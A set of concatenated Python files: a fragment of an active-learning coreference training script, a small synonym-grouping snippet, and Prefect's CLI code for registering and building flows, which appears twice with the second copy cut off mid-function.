model from {config["src_path"]}') acq_model = load_model(config, config['src_path']) src_path = config['src_path'] # no labeled instances queries = defaultdict(list) for i in range(config['start'], config['num_cycles'] + 1): logging.info(f'Cycle {i}') total_num_spans = i * config['num_spans'] cycle_dir = create_cycle_dir(config, i) model_file = cycle_dir / 'checkpoint.bin' queries_file = cycle_dir / 'queries.json' res_dev_file = cycle_dir / 'results_dev.json' res_test_file = cycle_dir / 'results_test.json' queries_found = False try: # check if queries for current cycle exist new_queries, num_queries = load_queries(queries_file) if num_queries < total_num_spans: raise ValueError(f'File does not contain enough queries') logging.info('Found queries already sampled for this cycle') logging.info(f'Loading queries from {queries_file}') queries = new_queries queries_found = True except ValueError: # else, sample new queries and concat with old queries logging.info(f'Sampling {config["num_spans"]} new queries by {config["strategy"]} for this cycle') strategy = config['strategy'] candidates = \ sample_spans(acq_model, data_train, queries, config, strategy, cycle=i) with open(queries_file, 'w') as f: json.dump(queries, f) # If model already exists and queries found, don't finetune new model if model_file.exists() and queries_found: logging.info('Finetuned model for cycle already exists') logging.info(f'Loading acq. model from {cycle_dir}') util.load_params(acq_model, model_file, "model") # evaluate model logging.info('Evaluating model') preds_file_dev = cycle_dir / 'preds_dev.json' scores_dev = eval_scores(acq_model, config, "dev", preds_file_dev) logging.info(f'Model has {scores_dev["f1"]:.3f} dev F1') output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file_test = cycle_dir / 'preds_test.json' scores_test = eval_scores(acq_model, config, "test", preds_file_test) output_results(res_test_file, config, i, scores_test) continue #move on to next cycle # get subset of train data for queried spans data_query, num_queries = extract_data(data_train, queries) # finetune model on queries logging.info( f'Finetuning src model on {num_queries} queries from {len(data_query)} docs' ) scores_dev, model = finetune_on_queries(config, data_query, cycle_dir, src_path) output_results(res_dev_file, config, i, scores_dev) if config["test_set"]: preds_file = cycle_dir / 'preds_test.json' scores_test = eval_scores(model, config, "test", preds_file) output_results(res_test_file, config, i, scores_test) logging.info(f'Saved model, queries, scores to {cycle_dir}') # set acquisition model to model finetuned on queries logging.info(f'Loading acq. model from {cycle_dir} for next cycle') util.load_params(acq_model, model_file, "model") # remove old model files if not config['save_ckpt']: logging.info(f'Removing {model_file}') model_file.unlink() def userstudy(config, data_train): """ Update the model based on feedback from user study. - [config]: hyperparameters for model fine-tuning - [data_train]: data pool to sample from """ def preprocess_data(doc, queries): """ Create a new field in [doc] called [antecedent_map] which processes the user-labeled [antecedents]. Add all labeled spans to [queries]. in queries). 
""" ante_map = {} for entry in doc['antecedents']: span = tuple(entry[0]) if entry[1] == -1: label = None elif entry[1] == 0: label = '0' else: label = [tuple(entry[1])] ante_map[span] = label doc['antecedent_map'] = ante_map del doc['antecedents'] # update queries to know what has been queried queries[doc['doc_key']] = list(ante_map.keys()) # return # spans labeled return len(ante_map) # preprocess antecedents and get queries data_fp = config['userstudy'] / 'train_data.jsonl' data = [] queries = defaultdict(list) num_queries = 0 with open(data_fp, 'r') as f: for line in f: doc = json.loads(line) # update doc and queries n = preprocess_data(doc, queries) num_queries += n data.append(doc) # finetune model on data src_path = config['src_path'] logging.info( f'Finetuning src model on {num_queries} queries from {len(data)} docs' ) scores_dev, model = finetune_on_queries(config, data, config['userstudy'], src_path) # test model results_fp = config['userstudy'] / 'results_test.json' scores_test = eval_scores(model, config, "test") output_results(results_fp, config, 1, scores_test) def write_config(c): config = copy.copy(c) config_path = config["sim_dir"] / "config.json" logging.info(f"Saved at {config_path}") config["device"] = str(config["device"]) config["sim_dir"] = str(config["sim_dir"]) config["src_path"] = str(config["src_path"]) with open(config_path, 'w+') as f: f.write(json.dumps(config, indent=4)) def change_log(logfile): log = logging.getLogger() for hdlr in log.handlers[:]: # remove the existing file handlers if isinstance(hdlr,logging.FileHandler): log.removeHandler(hdlr) filehandler = logging.FileHandler(logfile,'a') formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)s") filehandler.setFormatter(formatter) log.addHandler(filehandler) if __name__ == "__main__": config = util.initialize_from_env(use_overrides=True) config['src_path'] = pathlib.Path('checkpoint.bin') config['sim_dir'] = pathlib.Path(config['simulation_dir']) / config['run_name'] util.set_seed(config) train_pool = util.load_data(config[f'train_path'], num_examples=config['num_train_examples']) if 'user' in config: config['userstudy'] = \ pathlib.Path(f'/exp/myuan/userstudy/day1/session{config["session"]}') / config["user"] userstudy(config, train_pool) else: simulation(config, train_pool) write_config(config)
from collections import defaultdict words_with_synonyms = defaultdict(list) n = int(input()) for _ in range(n): word = input() synonym = input() words_with_synonyms[word].append(synonym) for word, synonyms in words_with_synonyms.items(): print(f'{word} - {", ".join(synonyms)}')
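# A quick, self-contained demonstration of the grouping logic above, with
# hardcoded pairs in place of input() so the expected output is visible (the
# words and synonyms are invented for this example).
from collections import defaultdict

sample_pairs = [('cute', 'sweet'), ('smart', 'clever'), ('cute', 'adorable')]
grouped = defaultdict(list)
for word, synonym in sample_pairs:
    grouped[word].append(synonym)

for word, synonyms in grouped.items():
    print(f'{word} - {", ".join(synonyms)}')
# Output:
# cute - sweet, adorable
# smart - clever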
import functools import hashlib import importlib import json import multiprocessing import os import runpy import sys import time import traceback import glob from collections import Counter, defaultdict from types import ModuleType from typing import Union, NamedTuple, List, Dict, Iterator, Tuple import marshmallow import click import box from click.exceptions import ClickException import prefect from prefect.utilities.filesystems import read_bytes_from_path, parse_path from prefect.utilities.graphql import with_args, EnumValue, compress from prefect.utilities.importtools import import_object from prefect.storage import Local, Module from prefect.run_configs import UniversalRun FlowLike = Union[box.Box, "prefect.Flow"] class SimpleFlowSchema(marshmallow.Schema): """A simple flow schema, only checks the `name` field""" class Meta: unknown = marshmallow.INCLUDE name = marshmallow.fields.Str() @marshmallow.post_load def post_load_hook(self, data, **kwargs): return box.Box(**data) class FlowsJSONSchema(marshmallow.Schema): """Schema for a `flows.json` file""" version = marshmallow.fields.Integer() flows = marshmallow.fields.List(marshmallow.fields.Nested(SimpleFlowSchema)) class TerminalError(Exception): """An error indicating the CLI should exit with a non-zero exit code""" pass def handle_terminal_error(func): """Wrap a command to handle a `TerminalError`""" @functools.wraps(func) def inner(*args, **kwargs): try: return func(*args, **kwargs) except TerminalError as exc: msg = str(exc) if msg: click.secho(msg, fg="red") sys.exit(1) return inner def log_exception(exc: Exception, indent: int = 0) -> None: """Log an exception with traceback""" prefix = " " * indent lines = traceback.format_exception( type(exc), exc, getattr(exc, "__traceback__", None) ) click.echo("".join(prefix + l for l in lines)) def get_module_paths(modules: List[str]) -> List[str]: """Given a list of modules, return their file paths.""" out = [] for name in modules: try: spec = importlib.util.find_spec(name) except Exception as exc: click.secho(f"Error loading module {name}:", fg="red") log_exception(exc, indent=2) raise TerminalError if spec is None: raise TerminalError(f"No module named {name!r}") else: out.append(spec.origin) return out def expand_paths(paths: List[str]) -> List[str]: """Given a list of paths, expand any directories to find all contained python files.""" out = [] globbed_paths = set() for path in tuple(paths): found_paths = glob.glob(path, recursive=True) if not found_paths: raise TerminalError(f"Path {path!r} doesn't exist") globbed_paths.update(found_paths) for path in globbed_paths: if os.path.isdir(path): with os.scandir(path) as directory: out.extend( e.path for e in directory if e.is_file() and e.path.endswith(".py") ) else: out.append(path) return out def load_flows_from_script(path: str) -> "List[prefect.Flow]": """Given a file path, load all flows found in the file""" # We use abs_path for everything but logging (logging the original # user-specified path provides a clearer message). abs_path = os.path.abspath(path) # Temporarily add the flow's local directory to `sys.path` so that local # imports work. This ensures that `sys.path` is the same as it would be if # the flow script was run directly (i.e. `python path/to/flow.py`). 
orig_sys_path = sys.path.copy() sys.path.insert(0, os.path.dirname(abs_path)) try: with prefect.context({"loading_flow": True, "local_script_path": abs_path}): namespace = runpy.run_path(abs_path, run_name="<flow>") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, 2) raise TerminalError finally: sys.path[:] = orig_sys_path flows = [f for f in namespace.values() if isinstance(f, prefect.Flow)] if flows: for f in flows: if f.storage is None: f.storage = Local(path=abs_path, stored_as_script=True) return flows def load_flows_from_module(name: str) -> "List[prefect.Flow]": """ Given a module name (or full import path to a flow), load all flows found in the module """ try: with prefect.context({"loading_flow": True}): mod_or_obj = import_object(name) except Exception as exc: # If the requested module (or any parent module) isn't found, log # without a traceback, otherwise log a general message with the # traceback. if isinstance(exc, ModuleNotFoundError) and ( name == exc.name or (name.startswith(exc.name) and name[len(exc.name)] == ".") ): raise TerminalError(str(exc)) elif isinstance(exc, AttributeError): raise TerminalError(str(exc)) else: click.secho(f"Error loading {name!r}:", fg="red") log_exception(exc, 2) raise TerminalError if isinstance(mod_or_obj, ModuleType): flows = [f for f in vars(mod_or_obj).values() if isinstance(f, prefect.Flow)] elif isinstance(mod_or_obj, prefect.Flow): flows = [mod_or_obj] # Get a valid module name for f.storage name, _ = name.rsplit(".", 1) else: click.secho( f"Invalid object of type {type(mod_or_obj).__name__!r} found at {name!r}. " f"Expected Module or Flow." ) raise TerminalError if flows: for f in flows: if f.storage is None: f.storage = Module(name) return flows def load_flows_from_json(path: str) -> "List[dict]": """Given a path to a JSON file containing flows, load all flows. Note that since `FlowSchema` doesn't roundtrip without mutation, we keep the flow objects as dicts. """ try: contents = read_bytes_from_path(path) except FileNotFoundError: raise TerminalError(f"Path {path!r} doesn't exist") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, indent=2) raise TerminalError from exc try: flows_json = FlowsJSONSchema().load(json.loads(contents)) except Exception: raise TerminalError(f"{path!r} is not a valid Prefect flows `json` file.") if flows_json["version"] != 1: raise TerminalError( f"{path!r} is version {flows_json['version']}, only version 1 is supported" ) return flows_json["flows"] class Source(NamedTuple): location: str kind: str def collect_flows( paths: List[str], modules: List[str], json_paths: List[str], names: List[str] = None, in_watch: bool = False, ) -> "Dict[Source, List[FlowLike]]": """Load all flows found in `paths` & `modules`. Args: - paths (List[str]): file paths to load flows from. - modules (List[str]): modules to load flows from. - json_paths (List[str]): file paths to JSON files to load flows from. - names (List[str], optional): a list of flow names to collect. If not provided, all flows found will be returned. - in_watch (bool): If true, any errors in loading the flows will be logged but won't abort execution. Default is False.
""" sources = [Source(p, "script") for p in paths] sources.extend(Source(m, "module") for m in modules) sources.extend(Source(m, "json") for m in json_paths) out = {} for s in sources: try: if s.kind == "module": flows = load_flows_from_module(s.location) elif s.kind == "json": flows = load_flows_from_json(s.location) else: flows = load_flows_from_script(s.location) except TerminalError: # If we're running with --watch, bad files are logged and skipped # rather than aborting early if not in_watch: raise out[s] = flows # Filter flows by name if requested if names: names = set(names) out = { source: [f for f in flows if f.name in names] for source, flows in out.items() } missing = names.difference(f.name for flows in out.values() for f in flows) if missing: missing_flows = "\n".join(f"- {n}" for n in sorted(missing)) click.secho( f"Failed to find the following flows:\n{missing_flows}", fg="red" ) if not in_watch: raise TerminalError # Drop empty sources out = {source: flows for source, flows in out.items() if flows} return out def prepare_flows(flows: "List[FlowLike]", labels: List[str] = None) -> None: """Finish preparing flows. Shared code between `register` and `build` for any flow modifications required before building the flow's storage. Modifies the flows in-place. """ labels = set(labels or ()) # Finish setting up all flows before building, to ensure a stable hash # for flows sharing storage instances for flow in flows: if isinstance(flow, dict): # Add any extra labels to the flow new_labels = set(flow["run_config"].get("labels") or []).union(labels) flow["run_config"]["labels"] = sorted(new_labels) else: # Set the default flow result if not specified if not flow.result: flow.result = flow.storage.result # Add a `run_config` if not configured explicitly if flow.run_config is None: flow.run_config = UniversalRun() # Add any extra labels to the flow (either specified via the CLI, # or from the storage object). flow.run_config.labels.update(labels) flow.run_config.labels.update(flow.storage.labels) # Add the flow to storage flow.storage.add_flow(flow) def get_project_id(client: "prefect.Client", project: str) -> str: """Get a project id given a project name. Args: - project (str): the project name Returns: - str: the project id """ resp = client.graphql( {"query": {with_args("project", {"where": {"name": {"_eq": project}}}): {"id"}}} ) if resp.data.project: return resp.data.project[0].id else: raise TerminalError(f"Project {project!r} does not exist") def register_serialized_flow( client: "prefect.Client", serialized_flow: dict, project_id: str, force: bool = False, schedule: bool = True, ) -> Tuple[str, int, bool]: """Register a pre-serialized flow. Args: - client (prefect.Client): the prefect client - serialized_flow (dict): the serialized flow - project_id (str): the project id - force (bool, optional): If `False` (default), an idempotency key will be generated to avoid unnecessary re-registration. Set to `True` to force re-registration. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - flow_id (str): the flow id - flow_version (int): the flow version - is_new (bool): True if this is a new flow version, false if re-registration was skipped. """ # Get most recent flow id for this flow. 
This can be removed once # the registration graphql routes return more information flow_name = serialized_flow["name"] resp = client.graphql( { "query": { with_args( "flow", { "where": { "_and": { "name": {"_eq": flow_name}, "project": {"id": {"_eq": project_id}}, } }, "order_by": {"version": EnumValue("desc")}, "limit": 1, }, ): {"id", "version"} } } ) if resp.data.flow: prev_id = resp.data.flow[0].id prev_version = resp.data.flow[0].version else: prev_id = None prev_version = 0 inputs = dict( project_id=project_id, serialized_flow=compress(serialized_flow), set_schedule_active=schedule, ) if not force: inputs["idempotency_key"] = hashlib.sha256( json.dumps(serialized_flow, sort_keys=True).encode() ).hexdigest() res = client.graphql( { "mutation($input: create_flow_from_compressed_string_input!)": { "create_flow_from_compressed_string(input: $input)": {"id"} } }, variables=dict(input=inputs), retry_on_api_error=False, ) new_id = res.data.create_flow_from_compressed_string.id if new_id == prev_id: return new_id, prev_version, False else: return new_id, prev_version + 1, True def build_and_register( client: "prefect.Client", flows: "List[FlowLike]", project_id: str, labels: List[str] = None, force: bool = False, schedule: bool = True, ) -> Counter: """Build and register all flows. Args: - client (prefect.Client): the prefect client to use - flows (List[FlowLike]): the flows to register - project_id (str): the project id in which to register the flows - labels (List[str], optional): Any extra labels to set on all flows - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - Counter: stats about the number of successful, failed, and skipped flows. """ # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage = flow.storage if isinstance(flow, prefect.Flow) else None storage_to_flows[storage].append(flow) # Register each flow, building storage as needed. # Stats on success/fail/skip rates are kept for later display stats = Counter(registered=0, errored=0, skipped=0) for storage, flows in storage_to_flows.items(): # Build storage if needed if storage is not None: click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Registering {flow.name!r}... 
{red_error}") stats["errored"] += 1 continue for flow in flows: click.echo(f" Registering {flow.name!r}...", nl=False) try: if isinstance(flow, box.Box): serialized_flow = flow else: serialized_flow = flow.serialize(build=False) flow_id, flow_version, is_new = register_serialized_flow( client=client, serialized_flow=serialized_flow, project_id=project_id, force=force, schedule=schedule, ) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) stats["errored"] += 1 else: if is_new: click.secho(" Done", fg="green") click.echo(f" └── ID: {flow_id}") click.echo(f" └── Version: {flow_version}") stats["registered"] += 1 else: click.secho(" Skipped (metadata unchanged)", fg="yellow") stats["skipped"] += 1 return stats def register_internal( project: str, paths: List[str], modules: List[str], json_paths: List[str] = None, names: List[str] = None, labels: List[str] = None, force: bool = False, schedule: bool = True, in_watch: bool = False, ) -> None: """Do a single registration pass, loading, building, and registering the requested flows. Args: - project (str): the project in which to register the flows. - paths (List[str]): a list of file paths containing flows. - modules (List[str]): a list of python modules containing flows. - json_paths (List[str]): a list of file paths containing serialied flows produced by `prefect build`. - names (List[str], optional): a list of flow names that should be registered. If not provided, all flows found will be registered. - labels (List[str], optional): a list of extra labels to set on all flows. - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. - in_watch (bool, optional): Whether this call resulted from a `register --watch` call. """ client = prefect.Client() # Determine the project id project_id = get_project_id(client, project) # Load flows from all files/modules requested click.echo("Collecting flows...") source_to_flows = collect_flows( paths, modules, json_paths, names=names, in_watch=in_watch ) # Iterate through each file, building all storage and registering all flows # Log errors as they happen, but only exit once all files have been processed stats = Counter(registered=0, errored=0, skipped=0) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") stats += build_and_register( client, flows, project_id, labels=labels, force=force, schedule=schedule ) # Output summary message registered = stats["registered"] skipped = stats["skipped"] errored = stats["errored"] parts = [click.style(f"{registered} registered", fg="green")] if skipped: parts.append(click.style(f"{skipped} skipped", fg="yellow")) if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # If not in a watch call, exit with appropriate exit code if not in_watch and stats["errored"]: raise TerminalError def watch_for_changes( paths: List[str] = None, modules: List[str] = None, period: float = 0.5, ) -> "Iterator[Tuple[List[str], List[str]]]": """Watch a list of paths and modules for changes. Yields tuples of `(paths, modules)` whenever changes are detected, where `paths` is a list of paths that changed and `modules` is a list of modules that changed. 
""" paths = list(paths or ()) modules = list(modules or ()) for path in paths: if not os.path.exists(path): raise TerminalError(f"Path {path!r} doesn't exist") if modules: # If modules are provided, we need to convert these to paths to watch. # There's no way in Python to do this without possibly importing the # defining module. As such, we run the command in a temporary process # pool. with multiprocessing.get_context("spawn").Pool(1) as pool: module_paths = pool.apply(get_module_paths, (modules,)) path_to_module = dict(zip(module_paths, modules)) else: path_to_module = {} tracked = paths + list(path_to_module) cache = dict.fromkeys(path_to_module) while True: cache2 = {} for path in tracked: try: try: with os.scandir(path) as directory: for entry in directory: if entry.is_file() and entry.path.endswith(".py"): old_mtime = cache.get(entry.path) mtime = entry.stat().st_mtime if mtime != old_mtime: cache2[entry.path] = mtime except NotADirectoryError: old_mtime = cache.get(path) mtime = os.stat(path).st_mtime if mtime != old_mtime: cache2[path] = mtime except FileNotFoundError: cache.pop(path, None) if cache2: change_paths = [] change_mods = [] for path in cache2: module = path_to_module.get(path) if module is not None: change_mods.append(module) else: change_paths.append(path) if change_paths or change_mods: yield change_paths, change_mods cache.update(cache2) time.sleep(period) REGISTER_EPILOG = """ \bExamples: \b Register all flows found in a directory. \b $ prefect register --project my-project -p myflows/ \b Register a flow named "example" found in `flow.py`. \b $ prefect register --project my-project -p flow.py -n "example" \b Register all flows found in a module named `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows" \b Register a flow in variable `flow_x` in a module `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows.flow_x" \b Register all pre-built flows from a remote JSON file. \b $ prefect register --project my-project --json https://some-url/flows.json \b Register all flows in python files found recursively using globbing \b $ prefect register --project my-project --path "**/*" \b Watch a directory of flows for changes, and re-register flows upon change. \b $ prefect register --project my-project -p myflows/ --watch \b Register a flow found in `flow.py` and disable its schedule. \b $ prefect register --project my-project -p flow.py --no-schedule """ @click.group(invoke_without_command=True, epilog=REGISTER_EPILOG) @click.option( "--project", help="The name of the Prefect project to register this flow in. Required.", default=None, ) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to register. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to register. May be the full " "import path to a flow. May be passed multiple times to specify multiple " "modules. " ), multiple=True, ) @click.option( "--json", "-j", "json_paths", help=( "A path or URL to a JSON file created by `prefect build` containing the flow(s) " "to register. May be passed multiple times to specify multiple paths. " "Note that this path may be a remote url (e.g. https://some-url/flows.json)." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to register from the specified paths/modules. 
If " "provided, only flows with a matching name will be registered. May be " "passed multiple times to specify multiple flows. If not provided, all " "flows found on all paths/modules will be registered." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all registered flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--force", "-f", help="Force flow registration, even if the flow's metadata is unchanged.", default=False, is_flag=True, ) @click.option( "--watch", help=( "If set, the specified paths and modules will be monitored and " "registration re-run upon changes." ), default=False, is_flag=True, ) @click.option( "--schedule/--no-schedule", help=( "Toggles the flow schedule upon registering. By default, the " "flow's schedule will be activated and future runs will be created. " "If disabled, the schedule will still be attached to the flow but " "no runs will be created until it is activated." ), default=True, ) @handle_terminal_error def register( project, paths, modules, json_paths, names, labels, force, watch, schedule ): """Register one or more flows into a project. Flows with unchanged metadata will be skipped as registering again will only change the version number. """ if project is None: raise ClickException("Missing required option '--project'") paths = expand_paths(paths) if watch: if any(parse_path(j).scheme != "file" for j in json_paths): raise ClickException("--watch is not supported for remote paths") json_paths = set(json_paths) ctx = multiprocessing.get_context("spawn") for change_paths_temp, change_mods in watch_for_changes( paths=paths, modules=modules ): change_paths = [] change_json_paths = [] for p in change_paths_temp: if p in json_paths: change_json_paths.append(p) else: change_paths.append(p) proc = ctx.Process( target=register_internal, name="prefect-register", args=(project,), kwargs=dict( paths=change_paths, modules=change_mods, json_paths=change_json_paths, names=names, labels=labels, force=force, in_watch=True, schedule=schedule, ), daemon=True, ) proc.start() proc.join() else: modules = list(modules or ()) register_internal( project, paths, modules, json_paths, names, labels, force, schedule ) BUILD_EPILOG = """ \bExamples: \b Build all flows found in a directory. \b $ prefect build -p myflows/ \b Build a flow named "example" found in `flow.py`. \b $ prefect build -p flow.py -n "example" \b Build all flows found in a module named `myproject.flows`. \b $ prefect build -m "myproject.flows" \b Build all flows in python files named `flow.py` found recursively using globbing \b $ prefect register --project my-project -p "**/flow.py" """ @click.command(epilog=BUILD_EPILOG) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to build. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to build. May be " "passed multiple times to specify multiple modules." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to build from the specified paths/modules. If " "provided, only flows with a matching name will be built. May be " "passed multiple times to specify multiple flows. If not provided, " "all flows found on all paths/modules will be built." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all built flow(s). 
May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--output", "-o", default="flows.json", help="The output path. Defaults to `flows.json`.", ) @click.option( "--update", "-u", is_flag=True, default=False, help="Updates an existing `json` file rather than overwriting it.", ) @handle_terminal_error def build(paths, modules, names, labels, output, update): """Build one or more flows. This command builds all specified flows and writes their metadata to a JSON file. These flows can then be registered without building later by passing the `--json` flag to `prefect register`. """ succeeded = 0 errored = 0 # If updating, load all previously written flows first if update and os.path.exists(output): serialized_flows = {f["name"]: f for f in load_flows_from_json(output)} else: serialized_flows = {} # Collect flows from specified paths & modules paths = expand_paths(list(paths or ())) modules = list(modules or ()) click.echo("Collecting flows...") source_to_flows = collect_flows(paths, modules, [], names=names) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage_to_flows[flow.storage].append(flow) for storage, flows in storage_to_flows.items(): # Build storage click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Building {flow.name!r}... {red_error}") errored += 1 continue # Serialize flows for flow in flows: click.echo(f" Building {flow.name!r}...", nl=False) try: serialized_flows[flow.name] = flow.serialize(build=False) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) errored += 1 else: click.secho(" Done", fg="green") succeeded += 1 # Write output file click.echo(f"Writing output to {output!r}") flows = [serialized_flows[name] for name in sorted(serialized_flows)] obj = {"version": 1, "flows": flows} with open(output, "w") as fil: json.dump(obj, fil, sort_keys=True) # Output summary message parts = [click.style(f"{succeeded} built", fg="green")] if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # Exit with appropriate status code if errored: raise TerminalError
import functools import hashlib import importlib import json import multiprocessing import os import runpy import sys import time import traceback import glob from collections import Counter, defaultdict from types import ModuleType from typing import Union, NamedTuple, List, Dict, Iterator, Tuple import marshmallow import click import box from click.exceptions import ClickException import prefect from prefect.utilities.filesystems import read_bytes_from_path, parse_path from prefect.utilities.graphql import with_args, EnumValue, compress from prefect.utilities.importtools import import_object from prefect.storage import Local, Module from prefect.run_configs import UniversalRun FlowLike = Union[box.Box, "prefect.Flow"] class SimpleFlowSchema(marshmallow.Schema): """A simple flow schema, only checks the `name` field""" class Meta: unknown = marshmallow.INCLUDE name = marshmallow.fields.Str() @marshmallow.post_load def post_load_hook(self, data, **kwargs): return box.Box(**data) class FlowsJSONSchema(marshmallow.Schema): """Schema for a `flows.json` file""" version = marshmallow.fields.Integer() flows = marshmallow.fields.List(marshmallow.fields.Nested(SimpleFlowSchema)) class TerminalError(Exception): """An error indicating the CLI should exit with a non-zero exit code""" pass def handle_terminal_error(func): """Wrap a command to handle a `TerminalError`""" @functools.wraps(func) def inner(*args, **kwargs): try: return func(*args, **kwargs) except TerminalError as exc: msg = str(exc) if msg: click.secho(msg, fg="red") sys.exit(1) return inner def log_exception(exc: Exception, indent: int = 0) -> None: """Log an exception with traceback""" prefix = " " * indent lines = traceback.format_exception( type(exc), exc, getattr(exc, "__traceback__", None) ) click.echo("".join(prefix + l for l in lines)) def get_module_paths(modules: List[str]) -> List[str]: """Given a list of modules, return their file paths.""" out = [] for name in modules: try: spec = importlib.util.find_spec(name) except Exception as exc: click.secho(f"Error loading module {name}:", fg="red") log_exception(exc, indent=2) raise TerminalError if spec is None: raise TerminalError(f"No module named {name!r}") else: out.append(spec.origin) return out def expand_paths(paths: List[str]) -> List[str]: """Given a list of paths, expand any directories to find all contained python files.""" out = [] globbed_paths = set() for path in tuple(paths): found_paths = glob.glob(path, recursive=True) if not found_paths: raise TerminalError(f"Path {path!r} doesn't exist") globbed_paths.update(found_paths) for path in globbed_paths: if os.path.isdir(path): with os.scandir(path) as directory: out.extend( e.path for e in directory if e.is_file() and e.path.endswith(".py") ) else: out.append(path) return out def load_flows_from_script(path: str) -> "List[prefect.Flow]": """Given a file path, load all flows found in the file""" # We use abs_path for everything but logging (logging the original # user-specified path provides a clearer message). abs_path = os.path.abspath(path) # Temporarily add the flow's local directory to `sys.path` so that local # imports work. This ensures that `sys.path` is the same as it would be if # the flow script was run directly (i.e. `python path/to/flow.py`). 
orig_sys_path = sys.path.copy() sys.path.insert(0, os.path.dirname(abs_path)) try: with prefect.context({"loading_flow": True, "local_script_path": abs_path}): namespace = runpy.run_path(abs_path, run_name="<flow>") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, 2) raise TerminalError finally: sys.path[:] = orig_sys_path flows = [f for f in namespace.values() if isinstance(f, prefect.Flow)] if flows: for f in flows: if f.storage is None: f.storage = Local(path=abs_path, stored_as_script=True) return flows def load_flows_from_module(name: str) -> "List[prefect.Flow]": """ Given a module name (or full import path to a flow), load all flows found in the module """ try: with prefect.context({"loading_flow": True}): mod_or_obj = import_object(name) except Exception as exc: # If the requested module (or any parent module) isn't found, log # without a traceback, otherwise log a general message with the # traceback. if isinstance(exc, ModuleNotFoundError) and ( name == exc.name or (name.startswith(exc.name) and name[len(exc.name)] == ".") ): raise TerminalError(str(exc)) elif isinstance(exc, AttributeError): raise TerminalError(str(exc)) else: click.secho(f"Error loading {name!r}:", fg="red") log_exception(exc, 2) raise TerminalError if isinstance(mod_or_obj, ModuleType): flows = [f for f in vars(mod_or_obj).values() if isinstance(f, prefect.Flow)] elif isinstance(mod_or_obj, prefect.Flow): flows = [mod_or_obj] # Get a valid module name for f.storage name, _ = name.rsplit(".", 1) else: click.secho( f"Invalid object of type {type(mod_or_obj).__name__!r} found at {name!r}. " f"Expected Module or Flow." ) raise TerminalError if flows: for f in flows: if f.storage is None: f.storage = Module(name) return flows def load_flows_from_json(path: str) -> "List[dict]": """Given a path to a JSON file containing flows, load all flows. Note that since `FlowSchema` doesn't roundtrip without mutation, we keep the flow objects as dicts. """ try: contents = read_bytes_from_path(path) except FileNotFoundError: raise TerminalError(f"Path {path!r} doesn't exist") except Exception as exc: click.secho(f"Error loading {path!r}:", fg="red") log_exception(exc, indent=2) raise TerminalError from exc try: flows_json = FlowsJSONSchema().load(json.loads(contents)) except Exception: raise TerminalError(f"{path!r} is not a valid Prefect flows `json` file.") if flows_json["version"] != 1: raise TerminalError( f"{path!r} is version {flows_json['version']}, only version 1 is supported" ) return flows_json["flows"] class Source(NamedTuple): location: str kind: str def collect_flows( paths: List[str], modules: List[str], json_paths: List[str], names: List[str] = None, in_watch: bool = False, ) -> "Dict[Source, List[FlowLike]]": """Load all flows found in `paths` & `modules`. Args: - paths (List[str]): file paths to load flows from. - modules (List[str]): modules to load flows from. - json_paths (List[str]): file paths to JSON files to load flows from. - names (List[str], optional): a list of flow names to collect. If not provided, all flows found will be returned. - in_watch (bool): If true, any errors in loading the flows will be logged but won't abort execution. Default is False. 
